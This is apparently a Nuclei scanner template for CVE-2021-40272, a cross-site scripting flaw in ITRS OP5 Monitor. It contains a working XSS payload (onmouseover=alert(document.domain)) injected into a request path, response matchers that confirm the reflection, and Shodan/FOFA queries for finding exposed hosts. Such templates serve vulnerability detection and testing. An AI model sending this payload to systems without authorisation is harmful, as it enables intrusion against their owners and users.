48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: CVE-2021-40272
|
|
|
|
info:
|
|
name: IRTS OP5 Monitor - Cross-Site Scripting
|
|
author: ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
OP5 Monitor 8.3.1, 8.3.2, and OP5 8.3.3 are vulnerable to Cross Site Scripting (XSS).
|
|
impact: |
|
|
Successful exploitation could lead to unauthorized access or data theft.
|
|
remediation: |
|
|
Update to the latest version of OP5 Monitor to mitigate the XSS vulnerability.
|
|
reference:
|
|
- https://github.com/hosakauk/exploits/blob/master/itrs_op5_monitor_xss.pdf
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40272
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cve-id: CVE-2021-40272
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:op5:monitor:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"ITRS"
|
|
fofa-query: title="ITRS"
|
|
product: monitor
|
|
vendor: op5
|
|
tags: cve2021,cve,irts,op5,xss
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(body, "help\'onmouseover=alert(document.domain)/\'/;/beta/license?format=json\'>JSON")
|
|
- contains_any(tolower(body), "op5 monitor", "itrs")
|
|
- contains(content_type, "text/html")
|
|
- status_code == 401
|
|
condition: and
|
|
# digest: 4a0a00473045022100c0dd70cd98673761f4193388ef489399b733b15caf79f24d0c5a4377feadabf502203d90ea4f3ddddaabbf7a138e378872da2cc793722757bc647b0cf6e65008ec1d:922c64590222798bb761d5b6d8e72950 |